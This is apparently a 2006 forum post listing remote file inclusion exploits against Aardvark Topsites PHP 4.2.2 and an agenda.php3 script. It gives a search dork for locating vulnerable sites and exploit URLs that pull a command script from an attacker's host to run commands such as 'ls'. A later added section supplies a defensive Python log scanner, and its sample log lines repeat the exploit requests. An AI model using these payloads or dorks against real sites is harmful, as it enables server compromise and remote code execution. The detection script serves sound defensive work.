Exploits to watch out for


sbovisjb1
30th April 2006, 21:08
Watch out for these and tell me if you have developed a method/patch for fixing them; these exploits are highly volatile.

Title: Aardvark Topsites PHP 4.2.2 remote file inclusion
URL: http://www.aardvarktopsitesphp.com/
Dork: "Powered By Aardvark Topsites PHP 4.2.2"

Exploit: /sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://yourhost/cmd.gif?cmd=ls

-------------------------------------------------------------------------------------------------------------------

Exploitation: remote file inclusion

/agenda.php3?rootagenda=http://www.yourspace.com/yourscript.php?
/agenda2.php3?rootagenda=http://www.yourspace.com/yourscript.txt?
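
For anyone checking whether their own server has seen requests like the ones listed in the post above, here is a log triage script, added as an example and not part of the original post or of either project's code. It flags any query parameter whose value is a remote URL, including percent-encoded ones; the log lines, client addresses, and the `month`, `year` and `ref` parameters are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Schemes a PHP include()/require() can fetch over the network.
REMOTE_URL = re.compile(r"^\s*(?:https?|ftps?)://", re.IGNORECASE)
# Client address and request target from a common/combined format log line.
LOG_LINE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def remote_url_params(target, allow=()):
    """Return [(name, value)] for query parameters whose value is a remote URL."""
    hits = []
    # parse_qsl percent-decodes, so http%3A%2F%2F... is caught as well.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if name not in allow and REMOTE_URL.match(value):
            hits.append((name, value))
    return hits


def scan(lines, allow=()):
    """Return [(client, path, param_name)] for every flagged parameter."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a request line in the expected format
        client, target = m.groups()
        for name, _value in remote_url_params(target, allow):
            findings.append((client, urlsplit(target).path, name))
    return findings


# Constructed access-log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [30/Apr/2006:21:08:00 +0000] "GET /sources/join.php?FORM[url]=owned'
    '&CONFIG[captcha]=1&CONFIG[path]=http://yourhost/cmd.gif?cmd=ls HTTP/1.1" 200 512',
    '192.0.2.11 - - [30/Apr/2006:21:09:00 +0000] "GET /agenda.php3?rootagenda='
    'http%3A%2F%2Fwww.yourspace.com%2Fyourscript.php%3F HTTP/1.0" 200 128',
    '192.0.2.12 - - [30/Apr/2006:21:10:00 +0000] "GET /agenda.php3?month=5&year=2006 HTTP/1.1" 200 2048',
    '192.0.2.13 - - [30/Apr/2006:21:11:00 +0000] "GET /index.php?ref=http://example.org/ HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG, allow=("ref",)):
        print(finding)
```

Parameters that legitimately carry URLs (a referrer or redirect target, for instance) also match, so pass their names in `allow` to keep them out of the findings.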